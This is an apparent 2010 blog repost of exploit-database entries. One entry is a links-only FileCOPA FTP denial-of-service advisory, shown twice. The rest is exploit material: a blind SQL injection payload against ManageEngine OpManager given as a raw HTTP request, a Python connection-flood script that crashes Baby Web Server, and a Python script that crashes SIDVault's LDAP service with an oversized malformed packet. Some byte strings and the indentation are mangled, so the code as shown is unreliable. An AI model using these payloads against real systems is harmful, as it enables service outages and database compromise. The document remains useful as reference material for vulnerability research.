Sunday, January 24, 2010

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html


find Details

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html


find Details

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662

Blind SQL/XPath injection in OPMANAGER

Blind SQL/XPath injection in OPMANAGER
packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289


Exploit Code

*******************************Blind SQL/XPath injection in OPMANAGER***********************************




# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]



Description

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Vulnerable:

http://overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes HTTP/1.0


Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache

Request:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8

Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability

Pablo Software Solutions Baby Web Server is prone to a remote denial-of-service vulnerability. An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
http://exploits.offensive-security.com/record.php?id=10171&type=dos
packetstormsecurity.org/0911-exploits/babywebserver.py.txt
http://www.securityfocus.com/bid/36942

Exploit Code
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket

print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (1,1100):
request = "GET /some.txt HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Oh! Some Problem Occured Check Server is Running or Not"

SIDVault Remote Denial of Service

#links-http://downloads.securityfocus.com/vulnerabilities/exploits/36394.py
#http://www.packetstormsecurity.org/0909-exploits/sidvault20evista-crash.txt
#http://inj3ct0r.com/%5Bremote%5D/1292
#SIDVault is prone to a remote denial-of-service vulnerability.
#Successful exploits allow remote attackers to cause the affected server to stop #responding, denying service to legitimate users.
#SIDVault 2.0e for Windows is vulnerable; other versions may also be affected.

#!/usr/bin/python

#
# $ ./ldap.py
#
# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe )
# Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3
# Coded by:asheesh anaconda

# Group DarkShinners


import sys
import socket

addr = "x33xbfx96x7c"
healthpacket = 'x41'*4095 + addr
evilpacket = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
evilpacket += healthpacket
evilpacket +=
'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'
print "[+] Sending evil packet"
print "[+] Wait ladp is getting crashh!!!!!!!!!!!!"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(evilpacket)
s.close()